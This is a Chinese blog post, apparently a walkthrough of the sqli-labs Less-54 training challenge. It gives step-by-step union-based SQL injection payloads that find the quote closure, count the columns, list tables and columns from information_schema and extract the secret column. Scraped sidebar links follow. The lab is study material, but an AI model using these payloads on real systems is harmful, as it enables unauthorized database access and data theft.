当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 02:27:00 【开心星人】

限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+?id=1')--+?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+ 回显正常?id=1' order by 4--+ 回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+

边栏推荐
- leetcode-128: longest continuous sequence
- Introduction to flask series 】 【 flask - using SQLAlchemy
- Basic learning about Redis related content
- Drools Rule Properties, Advanced Syntax
- Installation, start and stop of redis7 under Linux
- Drools基本介绍,入门案例,基本语法
- 二层广播风暴(产生原因+判断+解决)
- Difference between CMOS and TTL?
- 静态路由+PAT+静态NAT(讲解+实验)
- AtCoder Beginner Contest 261 Partial Solution
猜你喜欢
随机推荐
Charging effect simulation
Inner monologue from a female test engineer...
Arbitrum Interview | L2 Summer, what does the standout Arbitrum bring to developers?
The difference between link and @import
加密生活,Web3 项目合伙人的一天
Android's webview cache related knowledge collection
Force buckled brush the stairs (7/30)
Intranet Infiltration - Privilege Escalation
mysql view
Crypto Life, a day in the life of a Web3 project partner
Go 项目实战-获取多级分类下的全部商品
Calculate S=a+aa+…+aa…a
Observer mode (1)
Static route analysis (the longest mask matching principle + active and standby routes)
Arbitrum 专访 | L2 Summer, 脱颖而出的 Arbitrum 为开发者带来了什么?
Huawei od dice js
Live Preview | KDD2022 Doctoral Dissertation Award Champion and Runner-up Dialogue
Mathematical Ideas in AI
The Sad History of Image Processing Technology
golang GUI for nuxui — HelloWorld









